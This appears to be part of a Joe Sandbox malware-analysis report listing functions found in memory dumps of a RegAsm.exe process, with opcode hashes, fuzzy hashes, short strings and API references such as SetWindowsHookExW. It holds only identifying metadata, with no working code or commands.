Source File: 00000004.00000002.4147738190.0000000001340000.00000040.00000800.00020000.00000000.sdmp, Offset: 01340000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1340000_RegAsm.jbxd

Similarity

API ID: DuplicateHandle
String ID:
API String ID: 3793708945-0
Opcode ID: 7261771671290c35209cf1e499307967abfd1b5277e9e8e97cd26079779e44ff
Instruction ID: f49a073ae19686164bcd03ed4f40b170c48e5a129f1fa5200074f5b7834062ea
Opcode Fuzzy Hash: 7261771671290c35209cf1e499307967abfd1b5277e9e8e97cd26079779e44ff
Instruction Fuzzy Hash: B82100B5D00219DFDB10CFA9D984AEEBBF4EB08324F14841AE918A3350C374A954CFA4

Function 013498E0 Relevance: 1.6, APIs: 1, Instructions: 62COMMON

Download Yara Rule

APIs

DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 01349967

Memory Dump Source

Source File: 00000004.00000002.4147738190.0000000001340000.00000040.00000800.00020000.00000000.sdmp, Offset: 01340000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1340000_RegAsm.jbxd

Similarity

API ID: DuplicateHandle
String ID:
API String ID: 3793708945-0
Opcode ID: 0976e0d4b179615b24d46cdbf39a527f986c0032411259bb812e571a6a4c1ec1
Instruction ID: 3521d03199a2ed45326e7697aa39df559ee4d0a861dc56d34b29f80d87190327
Opcode Fuzzy Hash: 0976e0d4b179615b24d46cdbf39a527f986c0032411259bb812e571a6a4c1ec1
Instruction Fuzzy Hash: 6D21F3B5900249DFDB10CFAAD984ADEFFF8EB48724F14841AE958A3310C374A944CFA4

Function 01343CF0 Relevance: 1.6, APIs: 1, Instructions: 60COMMON

Download Yara Rule

APIs

SetWindowsHookExW.USER32(?,00000000,?,?), ref: 01343D73

Memory Dump Source

Source File: 00000004.00000002.4147738190.0000000001340000.00000040.00000800.00020000.00000000.sdmp, Offset: 01340000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1340000_RegAsm.jbxd

Similarity

API ID: HookWindows
String ID:
API String ID: 2559412058-0
Opcode ID: 531e97dbd0b18485f3b937042953890385df966490052f4b5681902d35851932
Instruction ID: a1494ab0e168fe9143325e22ddff313f5aa6992abfe9c9d11a85e69efcfcab53
Opcode Fuzzy Hash: 531e97dbd0b18485f3b937042953890385df966490052f4b5681902d35851932
Instruction Fuzzy Hash: 432137B59002199FCB14CF99C944BDEFBF5EF88324F148429D458A7250CB74A944CFA1

Function 01343CF8 Relevance: 1.6, APIs: 1, Instructions: 58COMMON

Download Yara Rule

APIs

SetWindowsHookExW.USER32(?,00000000,?,?), ref: 01343D73

Memory Dump Source

Source File: 00000004.00000002.4147738190.0000000001340000.00000040.00000800.00020000.00000000.sdmp, Offset: 01340000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1340000_RegAsm.jbxd

Similarity

API ID: HookWindows
String ID:
API String ID: 2559412058-0
Opcode ID: 419d5df9b6706cd9052e7979c03f9526e3e3e649ac28224a07ca3b228e6366bf
Instruction ID: 55c4833a55b188b8f46085b474340f704e46ef94cb4821a63d531adb4802a2a0
Opcode Fuzzy Hash: 419d5df9b6706cd9052e7979c03f9526e3e3e649ac28224a07ca3b228e6366bf
Instruction Fuzzy Hash: 572127B5D002199FDB14CF9AC944BDEFBF5FB88324F108429D459A7250CB74A944CFA5

Function 06A06B18 Relevance: 1.5, Strings: 1, Instructions: 213COMMON

Download Yara Rule

Strings

xbq, xrefs: 06A06E5E

Memory Dump Source

Source File: 00000004.00000002.4160276489.0000000006A00000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6a00000_RegAsm.jbxd

Similarity

API ID:
String ID: xbq
API String ID: 0-73991425
Opcode ID: 44f66d73a913df31844fa32e6509ebae2863646732c904c9dd723880538e38fd
Instruction ID: 14daec1e1248422e13c532ef9b2e4d30d7da369aecade4427b0e9883419b0e60
Opcode Fuzzy Hash: 44f66d73a913df31844fa32e6509ebae2863646732c904c9dd723880538e38fd
Instruction Fuzzy Hash: 3E916D729053458FEBA4EF19F84879977FABB84B28F14512AD4009B2D8C770B856CF81

Function 06A067F0 Relevance: 1.4, Strings: 1, Instructions: 127COMMON

Download Yara Rule

Strings

Te^q, xrefs: 06A0688E

Memory Dump Source

Source File: 00000004.00000002.4160276489.0000000006A00000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6a00000_RegAsm.jbxd

Similarity

API ID:
String ID: Te^q
API String ID: 0-671973202
Opcode ID: 1fd0a2efe92734cb1ae318cfd735554c8989340158f241bb1269d620d897eada
Instruction ID: 42683e2b16ccd620fc0ba04c3d1fc1d45e281db34632b1a562985dbc6d00bc6c
Opcode Fuzzy Hash: 1fd0a2efe92734cb1ae318cfd735554c8989340158f241bb1269d620d897eada
Instruction Fuzzy Hash: CC51AE74A40205DFE714EF6AE958BA9BBF2BF88714F104159E511AB3E5CB71AC40CF90

Function 06A05FD9 Relevance: 1.4, Strings: 1, Instructions: 110COMMON

Download Yara Rule

Strings

$^q, xrefs: 06A06025

Memory Dump Source

Source File: 00000004.00000002.4160276489.0000000006A00000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6a00000_RegAsm.jbxd

Similarity

API ID:
String ID: $^q
API String ID: 0-388095546
Opcode ID: c1fca214af7cd13fbd0421d62c4da60000f3019e3ef4c2ae9700ea59330c95a3
Instruction ID: 22104254e9b86a6592e684e54be42571bf8f6de0140a271b8b2eacdd9fa05b3f
Opcode Fuzzy Hash: c1fca214af7cd13fbd0421d62c4da60000f3019e3ef4c2ae9700ea59330c95a3
Instruction Fuzzy Hash: B341B434A08441CFE7897F19E618029BB77BF84B193298885E1468F6D6CB319D23CBD2

Function 06A07287 Relevance: 1.3, Strings: 1, Instructions: 73COMMON

Download Yara Rule

Strings

Te^q, xrefs: 06A072B5

Memory Dump Source

Source File: 00000004.00000002.4160276489.0000000006A00000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6a00000_RegAsm.jbxd

Similarity

API ID:
String ID: Te^q
API String ID: 0-671973202
Opcode ID: 6eb0bca5228154378aed09742eb0ada40bf2421dcde0598b7a97de916ad4f645
Instruction ID: baee671600d3f315faa7b4767d4eeef280958bd55bcc5bb3010605f90a00c657
Opcode Fuzzy Hash: 6eb0bca5228154378aed09742eb0ada40bf2421dcde0598b7a97de916ad4f645
Instruction Fuzzy Hash: 3C210230B10006AFEB54AB18DA18BAEBAF6BF8C710F10445AF401EB7E1CF749C058B90

Function 06A05EF8 Relevance: 1.3, Strings: 1, Instructions: 69COMMON

Download Yara Rule

Strings

Te^q, xrefs: 06A05F22

Memory Dump Source

Source File: 00000004.00000002.4160276489.0000000006A00000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6a00000_RegAsm.jbxd

Similarity

API ID:
String ID: Te^q
API String ID: 0-671973202
Opcode ID: fb02b7fcf73fcca3444819bbcc7d54a04405dfea8107c1f946dc672c40ada443
Instruction ID: 163343f09a7821523a6923f810a70923173d848a8c2fee76839fdb74f1d88bb6
Opcode Fuzzy Hash: fb02b7fcf73fcca3444819bbcc7d54a04405dfea8107c1f946dc672c40ada443
Instruction Fuzzy Hash: D9216F34B10110DFDB44EB28DA58BAE77F6AF88710F214059E106EB3E1CB749C04CB90

Function 06A05F08 Relevance: 1.3, Strings: 1, Instructions: 67COMMON

Download Yara Rule

Strings

Te^q, xrefs: 06A05F22

Memory Dump Source

Source File: 00000004.00000002.4160276489.0000000006A00000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6a00000_RegAsm.jbxd

Similarity

API ID:
String ID: Te^q
API String ID: 0-671973202
Opcode ID: 31b51bf18e724716cdabe8a130ece24bd513411befb98ab5ed9a6247657f6799
Instruction ID: 7665740d96c463afc160a94eb99a8982ce0a2f1282bee882e586c91e07c5d948
Opcode Fuzzy Hash: 31b51bf18e724716cdabe8a130ece24bd513411befb98ab5ed9a6247657f6799
Instruction Fuzzy Hash: 93215130B101148FEB44AB68EA58B6E77FAAF88710F214159F506DB3E5CF759C04CB91

Function 06A066D9 Relevance: 1.3, Strings: 1, Instructions: 66COMMON

Download Yara Rule

Strings

Te^q, xrefs: 06A06703

Memory Dump Source

Source File: 00000004.00000002.4160276489.0000000006A00000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6a00000_RegAsm.jbxd

Similarity

API ID:
String ID: Te^q
API String ID: 0-671973202
Opcode ID: 56e07876da19c12d61e1d0751e8139ec2e64ff6cbe41e05896260e72563eb5e8
Instruction ID: 7a8b5a5ef72f3c254c53b23cf44ca960a508dae63d76f9f2a396a3399e18effa
Opcode Fuzzy Hash: 56e07876da19c12d61e1d0751e8139ec2e64ff6cbe41e05896260e72563eb5e8
Instruction Fuzzy Hash: 4C117F30B402049FDB54AF29D898FAEBBA6AF88B14F144059E905AF3E5CB759C41CB90

Function 06A04810 Relevance: 1.3, Strings: 1, Instructions: 63COMMON

Download Yara Rule

Strings

$^q, xrefs: 06A0483C

Memory Dump Source

Source File: 00000004.00000002.4160276489.0000000006A00000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6a00000_RegAsm.jbxd

Similarity

API ID:
String ID: $^q
API String ID: 0-388095546
Opcode ID: 986779f82705657290e6c78d330f0fa17077b1915f386119341c33e3b572f70e
Instruction ID: db1bb36a59d8080ac358c4614776dcf13fa4ee407d1a8d9df8e0a4190ca97afd
Opcode Fuzzy Hash: 986779f82705657290e6c78d330f0fa17077b1915f386119341c33e3b572f70e
Instruction Fuzzy Hash: 79118C31B001448FE718AE6EE450A6E77DAEFD8750714803AE605CF274DA65DC42C7A0

Function 06A04800 Relevance: 1.3, Strings: 1, Instructions: 46COMMON

Download Yara Rule

Strings

$^q, xrefs: 06A0483C

Memory Dump Source

Source File: 00000004.00000002.4160276489.0000000006A00000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6a00000_RegAsm.jbxd

Similarity

API ID:
String ID: $^q
API String ID: 0-388095546
Opcode ID: 9180794185a4880010e3ee7c6e3b582b88dc36d4e6abfe791d1890e8391cee98
Instruction ID: 3d56743138df73c5b9ed78949ca8c4aeaecbbad0a63b08a579d3afd369aa35b7
Opcode Fuzzy Hash: 9180794185a4880010e3ee7c6e3b582b88dc36d4e6abfe791d1890e8391cee98
Instruction Fuzzy Hash: D801D630B002945BE7296B399860B6E6BDAAFC9740314446AF505DF2B5DE64DC4683E0

Function 06A04D17 Relevance: .3, Instructions: 267COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.4160276489.0000000006A00000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6a00000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a4170b09bf25adaa0430273ae4742b46e87926c35a9d5a364ef39a973d91002f
Instruction ID: 235f09ebc9c2684aee41a9bfd88c7f56a337fa0adc3ed03adba759f0eb45fea0
Opcode Fuzzy Hash: a4170b09bf25adaa0430273ae4742b46e87926c35a9d5a364ef39a973d91002f
Instruction Fuzzy Hash: 2CB19E30A00119CFEB54EF69E988AEEBBF6FF49710F158155E611AB2A4C730AC51CF90

Function 06A06ED0 Relevance: .2, Instructions: 248COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.4160276489.0000000006A00000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6a00000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a290031939b4acc18aeb38db7bacb77f428c2d78132deff1889829f941c0ed59
Instruction ID: 47e99c40a3284d604247141135124c7d53bcd7df6de8e2b25debe6a9973ddc68
Opcode Fuzzy Hash: a290031939b4acc18aeb38db7bacb77f428c2d78132deff1889829f941c0ed59
Instruction Fuzzy Hash: A1919D30B012108FDB48FF75E59866DB7B2EFC9304B108669E8069B395EF35EC468B91

Function 06A05C28 Relevance: .1, Instructions: 108COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.4160276489.0000000006A00000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6a00000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1d28e5907b627f916875e996eb3c36335c851b2446f675d89f60a6bd32d9d927
Instruction ID: 2865c0c9d1910c698ceb59ccfb620f88c34c3ee01fd8445bbbe20a4d71dd306a
Opcode Fuzzy Hash: 1d28e5907b627f916875e996eb3c36335c851b2446f675d89f60a6bd32d9d927
Instruction Fuzzy Hash: F5410275E00248DFDB54DFA9DA94ADEBBF5EF48310F24802AE405AB294DB30A945CF90

Function 06A061B0 Relevance: .1, Instructions: 107COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.4160276489.0000000006A00000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6a00000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ec71556263a18bd355ff96ee2a3f85d0f18f6d28c8b942af13880c55bcca39a4
Instruction ID: 6f08b3ca5de4786e7e4ebea118f02678eef3b139059511778a05ca6b5a4e1889
Opcode Fuzzy Hash: ec71556263a18bd355ff96ee2a3f85d0f18f6d28c8b942af13880c55bcca39a4
Instruction Fuzzy Hash: 92419E74A00115DFDB44EFA8D994E6AFBB2FF49314F5184A5E811AB7A2C730EC51CBA0

Function 06A05C1E Relevance: .1, Instructions: 97COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.4160276489.0000000006A00000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6a00000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 61b6748c0b430f09673b4ceb176a82d8d0aa9fa44a728d4126df9e795d57223f
Instruction ID: 7cb2f672d06fc2c878637aa5239a5e1722898a606c1f3a03a973aa7bbd9a82b7
Opcode Fuzzy Hash: 61b6748c0b430f09673b4ceb176a82d8d0aa9fa44a728d4126df9e795d57223f
Instruction Fuzzy Hash: F84132B1D01248DFDB14DFA9DA94BDEBBF6AF48304F10802AE409BB290DB746945CF50

Function 06A06EC0 Relevance: .1, Instructions: 77COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.4160276489.0000000006A00000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6a00000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 27e7a841938dee48926e4c1d07079b7145c8819fc95dc092d547b3c3b25eb560
Instruction ID: 9d98b2b12bc8c0247b15d42b6e1578b9e375f04c03e43ca4dfd54f2c06bf60be
Opcode Fuzzy Hash: 27e7a841938dee48926e4c1d07079b7145c8819fc95dc092d547b3c3b25eb560
Instruction Fuzzy Hash: D121C230B102104BDB44BB75B9981AE77B7AFC47587008629E906CB389EF36EC1687D2

Function 0129D47C Relevance: .1, Instructions: 72COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.4147165527.000000000129D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0129D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_129d000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0de9259e307af1004edcde297d9baf8db5e4a9f2e9671b9e523e7981a6645a63
Instruction ID: 1c461e09fbca9fd8f0cb02ca505c85cf57c931cba7becbc393e962c5e340f575
Opcode Fuzzy Hash: 0de9259e307af1004edcde297d9baf8db5e4a9f2e9671b9e523e7981a6645a63
Instruction Fuzzy Hash: 7E213471510208DFDF01DF5CE9C0B26BBA1FB84318F24C5ADE9094B256C376D446DB62

Function 0129D2CC Relevance: .1, Instructions: 72COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.4147165527.000000000129D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0129D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_129d000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 16b31ad7c0ee10a0a74d30711486d80abdc57255fece3f77e950c8e8c1acca48
Instruction ID: befde9e58da5bdccfcd98ec8eebca013bef6752b4ae60d3cc97a32ce528c402a
Opcode Fuzzy Hash: 16b31ad7c0ee10a0a74d30711486d80abdc57255fece3f77e950c8e8c1acca48
Instruction Fuzzy Hash: 912165B5514208DFCF01DF5CD9C4B2ABFA5FB84325F24CA79D9094B242C37AD446DAA1

Function 0129D110 Relevance: .1, Instructions: 72COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.4147165527.000000000129D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0129D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_129d000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: eb593fe31edccea943294871d844f29ec25e8628d693b73eaa6fea7ee25d764a
Instruction ID: 886680cdecc51a915eab1482c0bc1ef4a0f679d471901c9cd0466b1258c98496
Opcode Fuzzy Hash: eb593fe31edccea943294871d844f29ec25e8628d693b73eaa6fea7ee25d764a
Instruction Fuzzy Hash: 8D2134B6614208DFDF05DF9CD9C0B26BBA1EB84314F20C56DD9094B256C37AD446DA61

Function 06A061A1 Relevance: .1, Instructions: 72COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.4160276489.0000000006A00000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6a00000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: daa490171416853978fbbcb26bb830fa56433913ef467fa0d7137048e55b13e3
Instruction ID: 5de3ac1b02c6c84f3bdd9cbbc829690f71c72e88f933323c8bb94c8b523c097c
Opcode Fuzzy Hash: daa490171416853978fbbcb26bb830fa56433913ef467fa0d7137048e55b13e3
Instruction Fuzzy Hash: 8221C135A00111DFDB54EF98E9849AAFB72FF84315B4284A5E455AB692C730FD21CBE0

Function 06A06A38 Relevance: .1, Instructions: 60COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.4160276489.0000000006A00000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6a00000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a2c7f595c1e2c88d3a6719782e1a98fb2b78058509bdfa2c3b4cec8948530a97
Instruction ID: 02685c942f51d09a9fb5b9c0e399896943bec9da9e6c41d50cad0e795d5777fd
Opcode Fuzzy Hash: a2c7f595c1e2c88d3a6719782e1a98fb2b78058509bdfa2c3b4cec8948530a97
Instruction Fuzzy Hash: BC11B6702053915FCF06FB39F854A9DBB629FC2344B50876DD0004F796DB79A96A8BD0

Function 06A0698E Relevance: .1, Instructions: 57COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.4160276489.0000000006A00000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6a00000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 29559b4bf642ec72d96fe0c3f798cc99d5ee4016a261bd8e304a9d06e72bb308
Instruction ID: 765f7dd64d97e65d1f229994a83c8a38b80663f6be7d0a0a8f3afd4477fc734a
Opcode Fuzzy Hash: 29559b4bf642ec72d96fe0c3f798cc99d5ee4016a261bd8e304a9d06e72bb308
Instruction Fuzzy Hash: 35210235A042019FE790EF11E859A58BFB0FF417A8F15119BE015CFAE6C7649920CF80

Function 06A034F0 Relevance: .1, Instructions: 55COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.4160276489.0000000006A00000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6a00000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0ac10105a72cb9117acb96ce1026fec6e825a5ab82ded487fe7a487e24dfb92a
Instruction ID: 8331f6f48d8403dd4accfaee1a08d5b644425aed6745eb917abb209ab72d433c
Opcode Fuzzy Hash: 0ac10105a72cb9117acb96ce1026fec6e825a5ab82ded487fe7a487e24dfb92a
Instruction Fuzzy Hash: CF112A763001149FCF04DF59E884C5A7B7AEF88761B148156FA058B375CB32DC11DBA0

Function 0129D477 Relevance: .1, Instructions: 53COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.4147165527.000000000129D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0129D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_129d000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 17de7163a1e12a4c5df783ee0f29f24f6994aba7d146e6d7d26c00eb2d5c80d5
Instruction ID: 0a2e3294feff2481056fc4d7e7b0508f4eebda5f7e3a7636edfb5d46536ac41a
Opcode Fuzzy Hash: 17de7163a1e12a4c5df783ee0f29f24f6994aba7d146e6d7d26c00eb2d5c80d5
Instruction Fuzzy Hash: A511BB75504284CFDB02CF58E5C4B15BFA1FB84318F28C6AAD9094B656C33AD44ADB62

Function 0129D10B Relevance: .1, Instructions: 53COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.4147165527.000000000129D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0129D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_129d000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 17de7163a1e12a4c5df783ee0f29f24f6994aba7d146e6d7d26c00eb2d5c80d5
Instruction ID: 52a894124517e8544fe9e780f704cee0d5adbbb57a3371fe46f59bdc1f4e17e4
Opcode Fuzzy Hash: 17de7163a1e12a4c5df783ee0f29f24f6994aba7d146e6d7d26c00eb2d5c80d5
Instruction Fuzzy Hash: 38110DB6504284CFDB06CF68C9C0B15BFA1FB84318F28C6AEDD494B256C33AD44ADB61

Function 0129D2C7 Relevance: .1, Instructions: 53COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.4147165527.000000000129D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0129D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_129d000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: dff13d54f3b91835ad91617696d418c13a4717a8e78c88f658639b396ea067ac
Instruction ID: d00f9933ed9f817d2a1321128531cd2707702e0047da967ec29627a31bb56312
Opcode Fuzzy Hash: dff13d54f3b91835ad91617696d418c13a4717a8e78c88f658639b396ea067ac
Instruction Fuzzy Hash: B711B276504684CFDB12CF18D5C4B19FF61FB84324F24C6AAD9494B646C33AD44ADF51

Function 06A06A48 Relevance: .1, Instructions: 51COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.4160276489.0000000006A00000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6a00000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1da408bf9e2b957add3cb95d45e6d7971d896def6f40d8aa47b712d7efa228ff
Instruction ID: 0857d507a5875935662742d854f88fb4ec75913e2d3272520a0abfc59e7be515
Opcode Fuzzy Hash: 1da408bf9e2b957add3cb95d45e6d7971d896def6f40d8aa47b712d7efa228ff
Instruction Fuzzy Hash: F6119E702012555FCF05FB39E444A4DBBA6EFC1344B908729C0004F38ADB76B95A8BC0

Function 06A04798 Relevance: .0, Instructions: 42COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.4160276489.0000000006A00000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6a00000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: da527fd89853d84908aa843eb9e23c396a4f7ae11d070fb6c9f9bf0ea0be7e86
Instruction ID: 80869a3bbfaf47b53d501c82c47e40ffb970f064d2692036b89e2e3e3674ac99
Opcode Fuzzy Hash: da527fd89853d84908aa843eb9e23c396a4f7ae11d070fb6c9f9bf0ea0be7e86
Instruction Fuzzy Hash: E8016D35704218AFCB01DF59D884E9FBBEEFF8C211B14846AF509C7211CA30D9018BA0

Function 06A05B58 Relevance: .0, Instructions: 40COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.4160276489.0000000006A00000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6a00000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 12e0d03f4c7f0e1ef890a36ef095190929fda244c6c42d4e0137609eb3b7ca36
Instruction ID: 6615a122f766eb80f6ea3db1a886dae4bb18936d4692e61e7dce9628eba2e2b2
Opcode Fuzzy Hash: 12e0d03f4c7f0e1ef890a36ef095190929fda244c6c42d4e0137609eb3b7ca36
Instruction Fuzzy Hash: CAF09701B480540FC685B77C2A200EE0BC7DEC23103104A35C21ACBBD2CE285E0387E5

Function 06A047A8 Relevance: .0, Instructions: 38COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.4160276489.0000000006A00000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6a00000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c772dfea2ed08f54a7c31514507299020f0d5810de4a487f991fea554f221f89
Instruction ID: bee19b9b75a5b7821833f32624e7076988fa170124fddf9f8f8d127e01e44a8b
Opcode Fuzzy Hash: c772dfea2ed08f54a7c31514507299020f0d5810de4a487f991fea554f221f89
Instruction Fuzzy Hash: B5F0F976700118AF8B44DF5ADC84C9FBBAEFF8C261710842AF519C7310CA31DD018BA0

Function 06A02DF7 Relevance: .0, Instructions: 38COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.4160276489.0000000006A00000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6a00000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5dde35e46eb0e393537cfc02656154fc72d8224f8145094bbb401669c1182ada
Instruction ID: bc5ee5d128a5703fc7c00fd9c2ceaf97334262e468a2ff02942d6311d1815f75
Opcode Fuzzy Hash: 5dde35e46eb0e393537cfc02656154fc72d8224f8145094bbb401669c1182ada
Instruction Fuzzy Hash: 31015630905309DFCB40EFA9E8456DABBF6EF48310F20892DD559A7650D330AA42CF90

Function 06A04CA2 Relevance: .0, Instructions: 37COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.4160276489.0000000006A00000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6a00000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a2e3b514664e4861b4cdac8ad26dd650db35b2449f6adecde1c5e382e30ceb84
Instruction ID: 7964e02c1491ec6bfa95932776e226ffcd156255396a6da9322060d888297d85
Opcode Fuzzy Hash: a2e3b514664e4861b4cdac8ad26dd650db35b2449f6adecde1c5e382e30ceb84
Instruction Fuzzy Hash: B5F0F0311057606FD321476A9C809B3BFFEFF85310B04852EF6C287A52C634A819C7B0

Function 06A04CB0 Relevance: .0, Instructions: 31COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.4160276489.0000000006A00000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6a00000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f7262e674d45f604f64d41362ab118abe5965c62b0d9d568e2a5f9475c952ec3
Instruction ID: 2ac2d8c9a9ec903733b4070508ba0a1501ff4b0b7c1072bf0181339fc3bc95cb
Opcode Fuzzy Hash: f7262e674d45f604f64d41362ab118abe5965c62b0d9d568e2a5f9475c952ec3
Instruction Fuzzy Hash: 68F0A7715006246FD320575ADC80DB7BBEDFBC4311F108529F68646A40C675A855D7B0

Function 06A02E08 Relevance: .0, Instructions: 31COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.4160276489.0000000006A00000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A00000, based on PE: false

Joe Sandbox IDA Plugin

